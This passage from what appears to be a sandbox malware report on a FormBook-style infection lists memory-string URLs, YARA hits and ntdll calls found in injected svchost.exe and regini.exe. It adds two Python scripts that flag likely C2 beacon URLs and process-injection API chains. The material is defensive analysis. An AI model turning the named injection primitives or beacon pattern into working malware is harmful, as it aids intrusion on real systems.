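Source: regini.exe, 00000006.00000003.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: regini.exe, 00000006.00000003.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: regini.exe, 00000006.00000002.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: regini.exe, 00000006.00000002.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
"""

# Works for both "....sdmp String found" and the run-together "....sdmpString found".
STRING_LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*String found in binary or memory:\s*(?P<blob>\S+)"
)
# Assumed FormBook check-in shape: one short directory, then exactly two query
# parameters (short id, long base64-like blob). Heuristic, not a family rule.
C2_PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")
B64ISH_RE = re.compile(r"^[A-Za-z0-9+/_\-=]+$")
# Assumed allow-list of browser search providers seen as Chromium keyword templates.
SEARCH_PROVIDER_SUFFIXES = ("ecosia.org", "duckduckgo.com", "search.yahoo.com", "google.com")


def split_urls(blob):
    """Memory strings often run two URLs together; split at every scheme start."""
    return [u for u in re.split(r"(?=https?://)", blob) if u.startswith("http")]


def _bare_host(url):
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def formbook_beacon_params(url):
    """Return the (key, value) pairs if the URL has the assumed check-in shape, else None."""
    parts = urlsplit(url)
    if not C2_PATH_RE.match(parts.path):
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    if len(params) != 2:
        return None
    (k1, v1), (k2, v2) = params
    if not (k1.isalnum() and k2.isalnum() and B64ISH_RE.match(v1) and B64ISH_RE.match(v2)):
        return None
    if not (8 <= len(v1) <= 24 and len(v2) >= 32):
        return None
    return params


def beacon_hosts(urls):
    """Hosts that carry a full check-in URI; their bare-host and base-path forms count too."""
    return {_bare_host(u) for u in urls if formbook_beacon_params(u)}


def classify(url, c2_hosts=frozenset()):
    host = _bare_host(url)
    if host in c2_hosts or formbook_beacon_params(url):
        return "formbook_c2_candidate"
    if any(host == s or host.endswith("." + s) for s in SEARCH_PROVIDER_SUFFIXES):
        return "browser_search_provider"
    if host == "login.live.com":
        return "microsoft_account"
    return "other"


def extract_urls(text):
    """(source, url) pairs from string-extraction lines, one pair per URL."""
    found = []
    for line in text.splitlines():
        m = STRING_LINE_RE.search(line)
        if m:
            found.extend((m.group("src"), u) for u in split_urls(m.group("blob")))
    return found


def summarize(text):
    """Category -> sorted URLs. Two passes: find check-in hosts first so that the
    bare host and base path on the same domain are grouped with the beacon URL."""
    urls = [u for _, u in extract_urls(text)]
    hosts = beacon_hosts(urls)
    out = defaultdict(set)
    for u in urls:
        out[classify(u, hosts)].add(u)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for category, urls in summarize(SAMPLE_STRINGS).items():
        print(category)
        for u in urls:
            print("   ", u)
```

The path-only rule on its own would misfire (https://www.ecosia.org/newtab/ has the same /xxxx/ shape), which is why a host only becomes a C2 candidate once a full check-in URI is seen on it. FormBook is known to cycle through a list of domains of which most are decoys, so treat a hit here as a lead to confirm against the actual HTTP requests in the network section, not as a final C2 list.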

                E-Banking Fraud

                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C903 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A735C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A74340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A74650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A73D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03074340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03074650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030735C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072BA0 NtEnumerateValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072BE0 NtQueryValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030739B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072E80 NtReadVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03073010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03073090 NtSetValueKey
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03073D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03073D70 NtOpenThread
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_028D93B0 NtCreateFile
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_028D96D0 NtClose
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_028D9620 NtDeleteFile
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_028D9520 NtReadFile
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_028D9840 NtAllocateVirtualMemory
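The listing above enumerates ntdll native calls that the report resolved in code running inside svchost.exe and regini.exe, both legitimate system binaries that the sample uses as hosts. What matters for triage is the combination rather than any single call: NtWriteVirtualMemory and NtMapViewOfSection place code in another process, NtSetContextThread, NtQueueApcThread and NtResumeThread make it run, and NtCreateProcessEx, NtUnmapViewOfSection, NtAllocateVirtualMemory and NtProtectVirtualMemory prepare the target. The script below is an added example, not part of the Joe Sandbox report: it parses "Code function" lines in either the clean or the run-together form that text exports of these reports produce, collects the Nt* names per process, and reports whether a complete injection chain (a way to place code remotely plus a way to execute it) is present. The grouping of APIs into place/run/prepare is this example's own; the sample lines are constructed from entries in the listing, and notepad.exe is an invented negative case.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the report's "Code function" lines
# (function ids and APIs taken from the listing above; notepad.exe is an
# invented negative case, not a process from the report).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03074340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03072E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_028D9620 NtDeleteFile
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00401000 NtCreateFile,NtClose
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004187832_2_00418783
"""

# Matches "svchost.exe Code function: 2_2_... NtClose" and the run-together
# "svchost.exeCode function: 2_2_... NtClose,2_2_..." alike; the function id is
# pinned to eight hex digits so a duplicated id is not read as an API name.
CODE_FUNCTION_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<rest>[A-Za-z0-9_, ]*)"
)

# What each native call buys an injector. The grouping is this example's own.
PLACE_CODE = {
    "NtWriteVirtualMemory": "remote memory write",
    "NtMapViewOfSection": "section mapping into target",
}
RUN_CODE = {
    "NtSetContextThread": "thread context hijack",
    "NtQueueApcThread": "APC injection",
    "NtResumeThread": "resume suspended thread",
}
PREPARE_TARGET = {
    "NtCreateProcessEx": "create target process",
    "NtUnmapViewOfSection": "hollow target image",
    "NtAllocateVirtualMemory": "allocate in target",
    "NtProtectVirtualMemory": "make region executable",
    "NtSuspendThread": "suspend target thread",
}


def parse_code_functions(text):
    """Map each process (basename, lower-case) to the set of Nt* APIs resolved in its code."""
    apis_by_proc = defaultdict(set)
    for line in text.splitlines():
        m = CODE_FUNCTION_RE.search(line)
        if not m:
            continue
        proc = m.group("proc").replace("/", "\\").rsplit("\\", 1)[-1].lower()
        for tok in m.group("rest").split(","):
            tok = tok.strip()
            if tok.startswith("Nt"):
                apis_by_proc[proc].add(tok)
    return dict(apis_by_proc)


def assess_injection(apis_by_proc):
    """Per process: the injection primitives present, and whether the set is
    sufficient (at least one way to place code remotely and one way to run it)."""
    names = {**PLACE_CODE, **RUN_CODE}
    verdicts = {}
    for proc, apis in sorted(apis_by_proc.items()):
        place = sorted(a for a in apis if a in PLACE_CODE)
        run = sorted(a for a in apis if a in RUN_CODE)
        prepare = sorted(a for a in apis if a in PREPARE_TARGET)
        verdicts[proc] = {
            "place": place,
            "run": run,
            "prepare": prepare,
            "techniques": sorted(names[a] for a in place + run),
            "injection_capable": bool(place) and bool(run),
        }
    return verdicts


if __name__ == "__main__":
    for proc, v in assess_injection(parse_code_functions(SAMPLE_LINES)).items():
        flag = "INJECTION-CAPABLE" if v["injection_capable"] else "no complete chain"
        print(f"{proc}: {flag}; techniques: {', '.join(v['techniques']) or '-'}")
```

Run against the full report text, the same parser also shows which host process carries which half of the chain, which is the question to answer before deciding where to pull memory from: here both svchost.exe and regini.exe expose the whole set, consistent with one stage injecting the next.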
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418783
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004010D3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041697E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004101E3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E1E3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416983
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E327
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E333
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004045AC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402650
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042EF73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FFC3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FFBF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB9C32
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40C00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F132D
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0302D34C
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FA352
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0308739A
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0304E3F0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_031003E6
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030E0274
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030452A0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0305B2C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030E12ED
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03030100
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030DA118
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0307516C
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0302F172
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0310B16B
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0304B1B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_031001AA
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F81CC
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030EF0CC
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030470C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F70E9
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FF0E0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03064750
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03040770
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FF7B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0303C7C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F16CC
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0305C6E0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03040535
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F7571
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03100591
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030DD5B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FF43F
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F2446
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_03031460
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030EE4F6
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FAB40
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FFB76
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0305FB80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F6BD7
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0307DBF9
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030FFA49
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030F7A46
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030B3A6C
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_0303EA80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 6_2_030DDAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03085AA06_2_03085AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030EDAC66_2_030EDAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030499506_2_03049950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305B9506_2_0305B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030569626_2_03056962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030429A06_2_030429A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0310A9A66_2_0310A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030428406_2_03042840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304A8406_2_0304A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030268B86_2_030268B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030438E06_2_030438E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0306E8F06_2_0306E8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFF096_2_030FFF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03060F306_2_03060F30
